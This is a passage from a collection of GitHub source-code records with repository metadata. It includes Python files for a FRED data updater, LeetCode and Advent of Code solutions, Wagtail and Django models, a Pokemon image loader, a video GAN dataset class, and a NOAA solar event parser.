classification_labels))\r\n\r\n # This will render the go.html Please see that file. \r\n return render_template(\r\n 'go.html',\r\n query=query,\r\n classification_result=classification_results\r\n )\r\n\r\n\r\ndef main():\r\n app.run()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()","repo_name":"chen-bowen/Data_Science_Portfolio","sub_path":"Project 5 - Disaster Response Pipeline/app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5265,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"48"}
{"seq_id":"37714428014","text":"\"\"\"\nLast updated : 2017-09-13\nFile name : 05_update.py\n\nUsing the series_id values fetched through the fred update url,\nthe 03 and 04 steps are run without threads to perform the update.
The number of updates per day is a few thousand. No history (vintage) management has been implemented yet; files are wiped clean at the moment they are downloaded.\n\"\"\"\nfrom fred.path import *\nfrom fred.util import *\n\n# create the path automatically if it does not exist\nif not os.path.exists(update_observ_path):\n os.makedirs(update_observ_path)\n\ndelete_update_files(update_series_path)\ndelete_update_files(update_observ_path)\n\nconn = HTTPSConnection(fred_domain)\n\ncnt = 0\nmethod_cnt = 0\nis_end = False\n\n# 1000 is the default in the api; if you change it, apply the same value to limit and offset or the data gets tangled.\nchunk_unit = 1000\nobserv_chunk_unit = 100000\nupdate_offset = 0\n\n# keep the update start time\nthis_start_time = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\nprint(this_start_time)\n\n# if the last-update-time file does not exist, create it dated one day earlier\ntry:\n file = open(last_update_time, 'r')\nexcept IOError:\n with open(last_update_time, 'w', encoding='utf-8') as f:\n d = datetime.now() - timedelta(days=1)\n f.write(d.strftime(time_format))\n\n# read the start time of the previous update\nlast_start_time = datetime.strptime(open(last_update_time).read().strip(), time_format)\nprint(last_start_time)\n\n\ndef get_update_series(series_list):\n global cnt\n global method_cnt\n global update_offset\n global is_end\n\n method_cnt += 1\n\n print('[method] get_update_series start count :', method_cnt)\n\n for series_item in series_list:\n cnt += 1\n update_id = series_item['id']\n d = series_item['last_updated']\n update_time = datetime.strptime(d[:d.rfind('-')], time_format) + timedelta(hours=9)\n\n # once last_updated is earlier than last_update_start_time.txt, assume there are no further updates\n is_end = update_time < last_start_time\n print(cnt, update_time.strftime(time_format), update_id)\n\n if is_end:\n # record the update 'start' time and stop.. we use the start rather than the 'end' time because\n # time keeps passing while the records are being written,..\n # however, if this was a test run, the last update time will not be refreshed.\n if chunk_unit == 1000:\n with open(last_update_time, 'w', encoding='utf-8') as f:\n f.write(this_start_time)\n\n break\n else:\n try:\n # update the series meta\n filename = update_series_path + update_id + '.json'\n\n with open(filename, 'w', encoding='utf-8') as f2:\n ret2 = req(fred_series_url + update_id)['seriess'][0]\n f2.write(json.dumps(ret2))\n except:\n print('cannot update series meta from series_id', update_id)\n\n try:\n # update the observations\n ret = req(fred_series_observ_url + update_id + '&limit=' + str(observ_chunk_unit) + '&offset=' + str(0))\n observ_count = ret['count']\n v = observ_count // observ_chunk_unit\n if observ_count % observ_chunk_unit:\n v += 1\n o_l = []\n o_l += ret['observations']\n for mult in range(1, v):\n # print(series_id, mult, v)\n off = observ_chunk_unit * mult\n o_l += req(fred_series_observ_url + update_id + '&limit=' + str(observ_chunk_unit) + '&offset='\n + str(off))['observations']\n\n ret['observations'] = o_l\n with open(update_observ_path + update_id + '.json', 'w', encoding='utf-8') as f:\n f.write(json.dumps(ret))\n except:\n print('cannot update observation from series_id', update_id)\n\n if not is_end:\n # if is_end was not reached we get here; keep paging through updates with limit and offset.
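        # Editor's sketch (not in the original source): the limit/offset paging
        # that the recursion below performs, written as a plain loop. `req` and
        # `fred_series_update_url` come from this module; `handle_batch` is a
        # hypothetical stand-in for the per-series work done above.
        #
        #     offset = 0
        #     while True:
        #         batch = req(fred_series_update_url + '&limit=1000&offset=' + str(offset))['seriess']
        #         if not batch:
        #             break
        #         handle_batch(batch)
        #         offset += 1000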
update_offset += chunk_unit\n update_series = req(fred_series_update_url + '&limit=' + str(chunk_unit) + '&offset=' + str(update_offset))['seriess']\n get_update_series(update_series)\n\n\n# start the update\nupdate_series = req(fred_series_update_url)['seriess']\nget_update_series(update_series)\n","repo_name":"seraekim/srkim-py-fred","sub_path":"fred/05_update.py","file_name":"05_update.py","file_ext":"py","file_size_in_byte":4498,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
{"seq_id":"744361826","text":"class Solution:\n def __init__(self):\n self.l = []\n\n def permute(self, nums):\n n = len(nums)\n self.helper(0, nums, n)\n return self.l\n\n def helper(self, index, nums, n):\n if index == n-1:\n self.l.append(nums.copy())\n return\n\n for i in range(index, n):\n temp = nums[index]\n nums[index] = nums[i]\n nums[i] = temp\n self.helper(index + 1, nums, n)\n temp = nums[index]\n nums[index] = nums[i]\n nums[i] = temp\n\ns = Solution()\nprint(s.permute([1,2,3,4,5,6,7,8,9,10]))\n","repo_name":"wjqssb/leetcode","sub_path":"Medium/Permutations.py","file_name":"Permutations.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"38460620420","text":"import json\r\n\r\nf = open('genresForSorting.json')\r\n\r\n# returns JSON object as\r\n# a dictionary\r\ndata = json.load(f)\r\n\r\ndef bubbleSort(arr, genreArr):\r\n n = len(arr)\r\n\r\n # Traverse through all array elements\r\n for i in range(n - 1):\r\n # range(n) also works but the outer loop will repeat one time more than needed.\r\n\r\n # Last i elements are already in place\r\n for j in range(0, n - i - 1):\r\n\r\n # traverse the array from 0 to n-i-1\r\n # Swap if the element found is greater\r\n # than the next element\r\n if arr[j] < arr[j + 1]:\r\n arr[j], arr[j + 1] = arr[j + 1], arr[j]\r\n genreArr[j], genreArr[j + 1] = genreArr[j + 1], genreArr[j]\r\n return genreArr\r\n\r\ndef searchForGenres(values):\r\n if len(values) != 3:\r\n return None\r\n max = 0\r\n pos = 0\r\n for i in range(0, 3):\r\n if (values[i] > max):\r\n max = values[i]\r\n pos = i\r\n print(pos)\r\n sortedGenres = []\r\n sortedGenresValues = []\r\n for i in data:\r\n positiveValues = i['positive values']\r\n negativeValues = i['negative values']\r\n if (positiveValues[pos] > 0):\r\n sortedGenres.append(i['name'])\r\n sum = 0\r\n for j in range(0, 3):\r\n sum += (values[j] * positiveValues[j])\r\n sum += (values[j] * negativeValues[j])\r\n sortedGenresValues.append(sum)\r\n j = 0\r\n for i in sortedGenres:\r\n print(i + \": \" + str(sortedGenresValues[j]))\r\n j = j + 1\r\n sortedGenres = bubbleSort(sortedGenresValues, sortedGenres)\r\n print(sortedGenres)\r\n\r\n\r\n\r\nsearchForGenres([10, 10, 3])","repo_name":"CS196Illinois/Group-5","sub_path":"database/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":1675,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
{"seq_id":"2781713963","text":"from collections import Counter\nfrom typing import List, Callable\n\nfrom utils import read_file\n\ndata = read_file('03')\n\n\ndef bin_to_dec(binary: str) -> int:\n return int(binary, 2)\n\n\ndef get_power_consumption(report: List[str]) -> int:\n cols = list(zip(*report))\n gamma_rate = ''\n epsilon_rate = ''\n for col in cols:\n gamma, epsilon = Counter(col).most_common()\n gamma_rate += gamma[0][0]\n epsilon_rate += 
epsilon[0][0]\n return bin_to_dec(gamma_rate) * bin_to_dec(epsilon_rate)\n\n\nprint(get_power_consumption(data))\n\n\ndef oxygen_generator_rating(cnt: Counter, report: List[str], i: int) -> List[str]:\n mc = cnt.most_common()[0][0]\n if len(set(cnt.values())) == 1:\n mc = '1'\n return [bit_str for bit_str in report if bit_str[i] == mc]\n\n\ndef co2_scrubber_rating(cnt: Counter, report: List[str], i: int) -> List[str]:\n mc = cnt.most_common()[1][0]\n if len(set(cnt.values())) == 1:\n mc = '0'\n return [bit_str for bit_str in report if bit_str[i] == mc]\n\n\ndef get_rating(report: List[str], rating_fn: Callable) -> int:\n r = report.copy()\n i = 0\n while len(r) > 1:\n col = [ln[i] for ln in r]\n cnt = Counter(col)\n r = rating_fn(cnt, r, i)\n i += 1\n return bin_to_dec(r[0])\n\n\ndef get_life_support_rating(report: List[str]) -> int:\n return get_rating(report, oxygen_generator_rating) * get_rating(report, co2_scrubber_rating)\n\n\nprint(get_life_support_rating(data))\n","repo_name":"sschwa12/aoc2021","sub_path":"03.py","file_name":"03.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10813768815","text":"from django.core.paginator import EmptyPage, PageNotAnInteger, Paginator\nfrom django.db import models\nfrom django.shortcuts import render\n\nfrom wagtail.admin.panels import FieldPanel\nfrom wagtail.fields import RichTextField\nfrom wagtail.models import Page\nfrom wagtail.search import index\n\n\nclass NewsletterPage(Page):\n date = models.DateField(\"Newsletter date\")\n intro = RichTextField(blank=True)\n body = RichTextField()\n\n content_panels = Page.content_panels + [\n FieldPanel(\"date\"),\n FieldPanel(\"intro\"),\n FieldPanel(\"body\"),\n ]\n\n search_fields = Page.search_fields + [\n index.SearchField(\"intro\"),\n index.SearchField(\"body\"),\n ]\n\n def get_context(self, request, *args, **kwargs):\n context = super().get_context(request, *args, **kwargs)\n if request.GET.get(\"email\", \"false\") == \"true\":\n context[\"is_email\"] = True\n\n return context\n\n\nclass NewsletterIndexPage(Page):\n intro = RichTextField(blank=True)\n body = RichTextField()\n\n search_fields = Page.search_fields + [\n index.SearchField(\"intro\"),\n index.SearchField(\"body\"),\n ]\n\n @property\n def newsletters(self):\n # Get list of blog pages that are descendants of this page\n newsletters = NewsletterPage.objects.live().descendant_of(self)\n\n # Order by most recent date first\n newsletters = newsletters.order_by(\"-date\")\n\n return newsletters\n\n def serve(self, request):\n # Get blogs\n newsletters = self.newsletters\n\n # Pagination\n page = request.GET.get(\"page\")\n paginator = Paginator(newsletters, 5) # Show 5 blogs per page\n try:\n newsletters = paginator.page(page)\n except PageNotAnInteger:\n newsletters = paginator.page(1)\n except EmptyPage:\n newsletters = paginator.page(paginator.num_pages)\n\n return render(\n request, self.template, {\"self\": self, \"newsletters\": newsletters}\n )\n\n content_panels = Page.content_panels + [\n FieldPanel(\"intro\"),\n FieldPanel(\"body\"),\n ]\n\n\nclass NewsletterEmailAddress(models.Model):\n email = models.EmailField()\n signed_up_at = models.DateTimeField(null=True, 
auto_now_add=True)\n","repo_name":"wagtail/wagtail.org","sub_path":"wagtailio/newsletter/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"48"} +{"seq_id":"27558004834","text":"import json\r\nimport re\r\nimport os\r\nimport datetime\r\nimport matplotlib.pyplot as plt\r\n\r\ndef user_video_data():\r\n # videos_played= [[]]\r\n with open(\r\n \"/Users/shubham.bajpai/Documents/User_Engagement/source/Data_Extraction/video_process/user_id_daywise_timespent.json\") as json_data:\r\n x = json.load(json_data)\r\n user_data = {}\r\n max_videos = {}\r\n max_time = {}\r\n for i in range(15, 40):\r\n max_videos[i] = 1.0\r\n max_time[i] = 1.0\r\n for feature in x:\r\n video = {}\r\n for i in range(15, 40):\r\n video[i] = [0, 0]\r\n for days in x[feature].keys():\r\n year = days[:4]\r\n month = days[5:7]\r\n day = days[8:]\r\n # print year\r\n dt = datetime.date(int(year), int(month), int(day))\r\n week_number = dt.isocalendar()[1]\r\n if year == '2017' and week_number < 40:\r\n if week_number in video:\r\n videos = 0.0\r\n time = 0.0\r\n for key in x[feature][days].keys():\r\n # print x[feature][key]\r\n videos += 1\r\n time += float(x[feature][days][key])\r\n # print time, videos\r\n if max_videos[week_number] < videos:\r\n max_videos[week_number] = videos\r\n if max_time[week_number] < time:\r\n max_time[week_number] = time\r\n video[week_number] = [videos, time]\r\n user_data[feature] = video\r\n Z1 = sorted(user_data.keys())\r\n sorted_videos = []\r\n for index in Z1:\r\n sorted_videos.append(user_data[index])\r\n # print index,user_data[index]\r\n for users in Z1:\r\n key = user_data[users].keys()\r\n # print user_data[users]\r\n # print key\r\n value = []\r\n for i in range(15, 40):\r\n if i in range(15, 38):\r\n value.append(user_data[users][i][0])\r\n else:\r\n value.append(0)\r\n plt.plot(key, value)\r\n # plt.show()\r\n #plt.savefig(\"/Users/shubham.bajpai/Documents/User_Engagement/video_watched_plot/\" + users + \".png\")\r\n plt.clf()\r\n for users in Z1:\r\n key = user_data[users].keys()\r\n # print user_data[users]\r\n # print key\r\n value = []\r\n for i in range(15, 40):\r\n if i in range(15, 38):\r\n value.append(user_data[users][i][1])\r\n else:\r\n value.append(0)\r\n plt.plot(key, value)\r\n # plt.show()\r\n #plt.savefig(\"/Users/shubham.bajpai/Documents/User_Engagement/video_time_plot/\" + users + \".png\")\r\n plt.clf()\r\n for users in Z1:\r\n key=user_data[users].keys()\r\n #print user_data[users]\r\n #print key\r\n value = []\r\n for i in range(15, 40):\r\n if i in range(15,38):\r\n value.append(user_data[users][i][0])\r\n else:\r\n value.append(0)\r\n plt.plot(key, value)\r\n plt.savefig('video_watched.png')\r\n plt.show()\r\n plt.clf()\r\n #plt.clf()\r\n for users in Z1:\r\n key=user_data[users].keys()\r\n #print user_data[users]\r\n #print key\r\n value = []\r\n for i in range(15, 40):\r\n if i in range(15,38):\r\n value.append(user_data[users][i][1])\r\n else:\r\n value.append(0)\r\n plt.plot(key, value)\r\n plt.savefig('video_time_plot.png')\r\n plt.show()\r\n plt.clf()\r\n\r\n\r\nuser_video_data()","repo_name":"shubhambajpai1994/user_engagement-videoken","sub_path":"source/Data_Extraction/video_process/video_data.py","file_name":"video_data.py","file_ext":"py","file_size_in_byte":3724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5671086145","text":"#\n# @lc app=leetcode id=150 
lang=python3\n#\n# [150] Evaluate Reverse Polish Notation\n#\n\n# @lc code=start\nclass Solution:\n def evalRPN(self, tokens: list[str]) -> int:\n # add tokens to stack\n # when you find an operator, pop the last two operands, apply it, and push the result back onto the stack.\n stack = []\n for token in tokens:\n if token in (\"+\", \"-\", \"*\", \"/\"):\n num1 = stack.pop()\n num2 = stack.pop()\n # int() truncates toward zero, matching the problem's division rule\n stack.append(int(eval(f\"{num2} {token} {num1}\")))\n else:\n stack.append(int(token))\n return stack[0]\n \n# @lc code=end\nprint(Solution().evalRPN([\"4\"]))\n","repo_name":"felivalencia3/Leetcode","sub_path":"150.evaluate-reverse-polish-notation.py","file_name":"150.evaluate-reverse-polish-notation.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"4488303827","text":"from nltk.corpus import wordnet as wn\nimport itertools\n\ndef get_wordnet_dataset():\n word_info1 = []\n word_info2 = []\n word_info3 = []\n sentence1 = []\n sentence2 = []\n sentence3 = []\n\n # First strategy for generating positive samples\n for word in wn.all_lemma_names():\n for synset in wn.synsets(word):\n if word != synset.lemma_names()[0]: # the sense must begin with the current word\n continue\n if len(synset.examples()) > 2:\n global no_repetitions\n no_repetitions = []\n pos_sense_examples = list(itertools.combinations(synset.examples(), r = 2))\n sentence1.append(pos_sense_examples[0])\n sentence2.append(pos_sense_examples[1])\n word_info1.append(synset._name)\n word_info2.append(synset._name)\n \n\n print(1)\n\n\n\ndef test(word):\n syns = wn.synsets(word)\n print(syns[0].name())\n print(syns[0].lemmas()[0].name())\n\nif __name__ == \"__main__\":\n get_wordnet_dataset()\n # test(\"program\")","repo_name":"Jhin3433/Event_SimCSE","sub_path":"event/discard/Wordnet_processing.py","file_name":"Wordnet_processing.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"35841437353","text":"import math\n\nimport numpy as np\n\nfrom main import open_file\n\ne_numbers = np.array(list(open_file()))\n\n\nclass Generator1:\n\n def __init__(self, seed=0, nb_digits=10):\n self.seed = seed\n self.index = seed % len(e_numbers)\n self.nb_digits = nb_digits\n\n def random(self):\n digits = []\n for i in range(self.nb_digits):\n digit = e_numbers[self.index]\n digits.append(digit)\n self.index = (self.index + 1) % len(e_numbers)\n return float(\"0.\" + \"\".join(map(lambda x: str(x), digits)))\n\n\nclass Generator2:\n\n def __init__(self, seed=0, nb_digits=10):\n self.seed = seed\n self.index = seed % len(e_numbers)\n self.nb_digits = nb_digits\n\n def random(self):\n xyz = []\n for j in range(3):\n digits = []\n for k in range(self.nb_digits):\n digit = e_numbers[self.index]\n digits.append(digit)\n self.index = (self.index + 1) % len(e_numbers)\n xyz.append(float(\"0.\" + \"\".join(map(lambda x: str(x), digits))))\n return math.sqrt(sum([x ** 2 for x in xyz])) / math.sqrt(3)\n\n\nclass Generator3:\n\n def __init__(self, seed=0, precision=53):\n self.seed = seed\n self.index = seed % len(e_numbers)\n self.precision = precision # IEEE 754 double has 53 bits of precision\n\n def random(self):\n bits = 0\n generated = 0\n while bits < self.precision:\n rn = e_numbers[self.index]\n\n if rn > 7:\n self.index = (self.index + 1) % len(e_numbers)\n continue\n\n three_bits = (\n rn & 1,\n (rn & 2) // 2,\n (rn & 4) // 4\n )\n\n for i in range(3):\n if bits >= self.precision:\n break\n generated = (generated << 1) | three_bits[i]\n bits 
+= 1\n\n self.index = (self.index + 1) % len(e_numbers)\n return generated / 2 ** self.precision\n","repo_name":"laurencefloriani/simulation","sub_path":"generators.py","file_name":"generators.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"31200600937","text":"import unittest\nfrom L19.test_L17.classes.employee_recruiter_developer import Recruiter\n\n\nclass TestRecruiter(unittest.TestCase):\n def test_str(self):\n rec = Recruiter('Valeriya Belyayeva', 20, '848belval848@gmail.com')\n self.assertEqual(\"Recruiter: Valeriya Belyayeva, Salary: 0\", f\"Recruiter: {rec.name}, Salary: {rec.check_salary()}\")\n\n def test_compare(self):\n rec1 = Recruiter('Valeriya Belyayeva', 20, '848belval848@gmail.com')\n rec2 = Recruiter('Brittney Skil', 20, 'brittney36@ccategoryk.com')\n rec3 = Recruiter('Brittney Well', 30, 'brittney36@ccategoryk.com')\n self.assertTrue(rec1 == rec2)\n self.assertFalse(rec1 > rec2)\n self.assertTrue(rec3 > rec2)\n\n def test_work(self):\n rec1 = Recruiter('Valeriya Belyayeva', 20, '848belval848@gmail.com')\n self.assertEqual('I come to the office and start to hiring.', rec1.work())","repo_name":"belva1/htasks_module3","sub_path":"L19/test_L17/tests/test_recruiter.py","file_name":"test_recruiter.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"69820904785","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\nimport bitfield.models\nimport dirtyfields.dirtyfields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='MessageLink',\n fields=[\n ('id', models.AutoField(primary_key=True, verbose_name='ID', serialize=False, auto_created=True)),\n ('chat_id', models.BigIntegerField()),\n ('original_message_id', models.BigIntegerField()),\n ('new_chat_id', models.BigIntegerField(db_index=True)),\n ('new_message_id', models.BigIntegerField(db_index=True)),\n ('extra', models.CharField(max_length=255, default='')),\n ('created_at', models.DateTimeField(auto_now_add=True)),\n ],\n ),\n migrations.CreateModel(\n name='TgChat',\n fields=[\n ('id', models.AutoField(primary_key=True, verbose_name='ID', serialize=False, auto_created=True)),\n ('created_at', models.DateTimeField(auto_now_add=True)),\n ('updated_at', models.DateTimeField(auto_now=True)),\n ('tg_id', models.BigIntegerField(unique=True)),\n ('active', models.BooleanField(default=True, verbose_name='Active?')),\n ('type', models.CharField(max_length=10)),\n ('title', models.CharField(max_length=255)),\n ],\n options={\n 'verbose_name_plural': '4. TgChat',\n 'verbose_name': 'TgChat',\n },\n bases=(dirtyfields.dirtyfields.DirtyFieldsMixin, models.Model),\n ),\n migrations.CreateModel(\n name='TgMessage',\n fields=[\n ('id', models.AutoField(primary_key=True, verbose_name='ID', serialize=False, auto_created=True)),\n ('tg_id', models.BigIntegerField(default=0, db_index=True)),\n ('from_tg_id', models.BigIntegerField(default=0)),\n ('message_id', models.BigIntegerField()),\n ('chat_type', models.CharField(max_length=100)),\n ('requests_made', models.IntegerField(default=0)),\n ('fnc', models.CharField(max_length=80, default='', db_index=True)),\n ('result', models.CharField(max_length=100, default='', db_index=True)),\n ('text', models.TextField()),\n ('message', models.TextField()),\n ('date', models.DateTimeField()),\n ('created_at', models.DateTimeField(db_index=True, auto_now_add=True)),\n ('tgchat', models.ForeignKey(to='bot.TgChat', on_delete=django.db.models.deletion.SET_NULL, null=True)),\n ],\n options={\n 'verbose_name_plural': '2. TgMessage',\n 'verbose_name': 'TgMessage',\n },\n ),\n migrations.CreateModel(\n name='TgUser',\n fields=[\n ('id', models.AutoField(primary_key=True, verbose_name='ID', serialize=False, auto_created=True)),\n ('created_at', models.DateTimeField(auto_now_add=True)),\n ('updated_at', models.DateTimeField(auto_now=True)),\n ('tg_id', models.BigIntegerField(unique=True)),\n ('active', models.BooleanField(default=True, verbose_name='Active?')),\n ('username', models.CharField(max_length=255, blank=True)),\n ('first_name', models.CharField(max_length=255)),\n ('last_name', models.CharField(max_length=255, default='', blank=True)),\n ('last_active_at', models.DateTimeField(blank=True, null=True)),\n ('dialog', models.CharField(max_length=255, default='', editable=False, blank=True)),\n ('flags', bitfield.models.BitField((), blank=True, default=None)),\n ],\n options={\n 'verbose_name_plural': '1. 
TgUser',\n 'verbose_name': 'TgUser',\n },\n bases=(dirtyfields.dirtyfields.DirtyFieldsMixin, models.Model),\n ),\n migrations.CreateModel(\n name='Trello',\n fields=[\n ('id', models.AutoField(primary_key=True, verbose_name='ID', serialize=False, auto_created=True)),\n ('token', models.CharField(max_length=100)),\n ('token_created_at', models.DateTimeField()),\n ('tguser', models.OneToOneField(verbose_name='TgUser', to='bot.TgUser')),\n ],\n ),\n migrations.AddField(\n model_name='tgmessage',\n name='tguser',\n field=models.ForeignKey(to='bot.TgUser', on_delete=django.db.models.deletion.SET_NULL, null=True),\n ),\n ]\n","repo_name":"ihoru/trelloplusbot","sub_path":"bot/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":4875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21004164011","text":"import os\nimport numpy as np \nfrom tqdm import tqdm\nimport cv2\nimport pypokedex as dex\nimport random\nimport sys\nsys.path.insert(0,'..')\nimport utils\n\nclass data_manager:\n \"\"\"\n Class to manage the pokemon images and additional data.\n\n only works with pokemon up to dex number 807 until pypokedex is updated.\n simply remove the if statement in the __init__ function if it gets updated!\n\n this data pipeline is intended for tensorflow + keras\n \"\"\"\n def __init__(self, path=os.path.join(\"..\", \"clean_pkm\")):\n \"\"\"\n init loads all pokemon images and data.\n it creates a list with images and a list with data/labels\n \"\"\"\n if not os.path.isdir(path):\n raise NotADirectoryError\n \n self.images = []\n self.pkm = []\n\n for f_name in tqdm(os.listdir(path)):\n if os.path.isdir(os.path.join(path, f_name)):\n continue\n dex_number = int(f_name.split(\".\")[0].split(\"_\")[0].split(\"-\")[0])\n\n # remove this in the case of a pypokedex update\n if dex_number <= 807:\n self.images.append(cv2.cvtColor(cv2.imread(os.path.join(path, f_name)), cv2.COLOR_BGR2RGB))\n self.pkm.append(dex.get(dex=dex_number))\n\n def shuffle(self):\n z = list(zip(self.images, self.pkm))\n random.shuffle(z)\n self.images, self.pkm = zip(*z)\n\n\n\n\n\nif __name__ == \"__main__\":\n data = data_manager()\n data.shuffle()\n\n imgs = data.images[0:20]\n lbls = [p.name for p in data.pkm[0:20]]\n\n utils.plot_images(imgs, lbls=lbls)\n","repo_name":"Niklas-Penzel/PokeGAN","sub_path":"data_pipeline/data_manager.py","file_name":"data_manager.py","file_ext":"py","file_size_in_byte":1587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17828578655","text":"import os\nfrom os.path import join as opj\nimport random\nimport numpy as np\n\nfrom PIL import Image\nimport torchvision.transforms as T\nfrom torch.utils.data import Dataset\n\nIMG_EXTENSIONS = [\n '.jpg', '.JPG', '.jpeg', '.JPEG', '.pgm', '.PGM',\n '.png', '.PNG', '.ppm', '.PPM', '.bmp', '.BMP', '.tiff', \n '.txt', '.json'\n]\n\nclass BaseDataset(Dataset):\n def __init__(self, args):\n super().__init__()\n self.args = args\n def name(self):\n return \"BaseDataset\"\ndef is_image_file(f):\n return any(f.endswith(extension) for extension in IMG_EXTENSIONS)\ndef make_grouped_dataset(dir):\n images = []\n fnames = sorted(os.walk(dir))\n for fname in sorted(fnames):\n paths = []\n root = fname[0]\n for f in sorted(fname[2]):\n if is_image_file(f):\n paths.append(opj(root, f))\n if len(paths) > 0:\n images.append(paths)\n return images\ndef _scale_width(img, target_width, method=Image.BICUBIC):\n ow, oh = 
img.size\n if ow == target_width:\n return img\n w = target_width\n h = int(target_width * oh / ow)\n return img.resize((w, h), method)\ndef _crop(img, pos, size):\n ow, oh = img.size\n x1, y1 = pos\n tw = th = size\n if ow > tw or oh > th:\n return img.crop((x1, y1, x1+tw, y1+th))\n return img\ndef _make_power_2(img, base, method=Image.BICUBIC):\n ow, oh = img.size\n h = int(round(oh / base) * base)\n w = int(round(ow / base) * base)\n if (h == oh) and (w == ow):\n return img\n return img.resize((w, h), method)\ndef _flip(img, flip):\n if flip:\n return img.transpose(Image.FLIP_LEFT_RIGHT)\n return img\ndef get_img_params():\n flip = random.random() > 0.5\n return {\"flip\": flip}\ndef get_transforms(args, params, is_train=True):\n T_lst = []\n T_lst.append(T.Resize((args.img_size, args.img_size), interpolation=Image.BICUBIC))\n if is_train and args.use_flip:\n T_lst.append(T.Lambda(lambda img: _flip(img, params[\"flip\"])))\n T_lst.append(T.ToTensor())\n if args.input_ch == 1:\n T_lst.append(T.Normalize((0.5), (0.5)))\n elif args.input_ch == 3:\n T_lst.append(T.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)))\n return T.Compose(T_lst)\ndef get_video_params(args, n_frames_total, cur_seq_len, idx, is_train):\n tG = args.n_frames_G\n if is_train:\n n_frames_total = min(n_frames_total, cur_seq_len - tG + 1)\n n_frames_total = n_frames_total + tG - 1\n max_t_step = min(args.max_t_step, (cur_seq_len-1)//(n_frames_total-1))\n t_step = np.random.randint(max_t_step)+1\n offset_max = max(1, cur_seq_len - (n_frames_total-1)*t_step)\n start_idx = np.random.randint(offset_max)\n else:\n n_frames_total = tG\n start_idx = idx\n t_step = 1\n return n_frames_total, start_idx, t_step\n\n\n\n\n\n\n ","repo_name":"rlawjdghek/Generative_Models","sub_path":"GANs/Vid2Vid/datasets/base_dataset.py","file_name":"base_dataset.py","file_ext":"py","file_size_in_byte":2845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"72784748305","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Jun 7 17:16:42 2022\r\n\r\n@author: mas1a\r\n\"\"\"\r\n\r\nimport os\r\nimport pandas as pd\r\n\r\ncontenido = os.listdir('../Data/NOAAtxt')\r\n\r\ndef main():\r\n for i in range(0, len(contenido), 1):\r\n ### Variables\r\n starthour = []\r\n startmin = []\r\n endhour = []\r\n endmin = []\r\n duration = []\r\n seconds = []\r\n frecstart = []\r\n frecend = []\r\n intensity = []\r\n arrayobs = []\r\n ### Parameters\r\n frec = []\r\n quarterstart = []\r\n quarterend = []\r\n partduration = []\r\n relevance = []\r\n \r\n ### Read files\r\n txt = read_txt(i)\r\n fichero = open(txt)\r\n lineas = fichero.readlines()\r\n for linea in range(0, len(lineas), 1):\r\n if linea == 2:\r\n line = lineas[2]\r\n day = line[15:17]\r\n day = int(day) # day\r\n month = line[12:14]\r\n month = int(month) # month\r\n year = line[7:11]\r\n year = int(year) # year\r\n if linea > 11 and len(lineas[linea]) == 81:\r\n line = lineas[linea]\r\n typ = line[43:46] # type RSP\r\n obs = line[34:37] # observatory\r\n if typ == 'RSP':\r\n if obs == 'SVI' or obs == 'CUL' or obs == 'LEA':\r\n arrayobs.append(obs)\r\n starth = line[11:13]\r\n starth = int(starth)\r\n starthour.append(starth)\r\n startm = line[13:15]\r\n startm = int(startm)\r\n startmin.append(startm)\r\n endh = line[28:30]\r\n endh = int(endh)\r\n endhour.append(endh)\r\n endm = line[30:32]\r\n endm = int(endm)\r\n endmin.append(endm)\r\n fstart = line[48:51]\r\n fstart = int(fstart)\r\n frecstart.append(fstart)\r\n fend = line[52:55]\r\n fend = int(fend)\r\n frecend.append(fend)\r\n dur = (endh - starth)*60 + (endm - startm) + 1\r\n duration.append(dur)\r\n inten = line[58:63]\r\n intensity.append(inten)
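        # Editor's sketch (not in the original source): the slices above
        # (line[11:13], line[28:30], line[48:51], ...) are fixed-width field
        # extraction from the 81-character NOAA report lines. The same idea on
        # a hypothetical record, with made-up column positions:
        #
        #     record = '0123 0456'                 # fixed-width line (illustrative)
        #     start_h, start_m = int(record[0:2]), int(record[2:4])
        #     end_h, end_m = int(record[5:7]), int(record[7:9])
        #     minutes = (end_h - start_h) * 60 + (end_m - start_m) + 1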
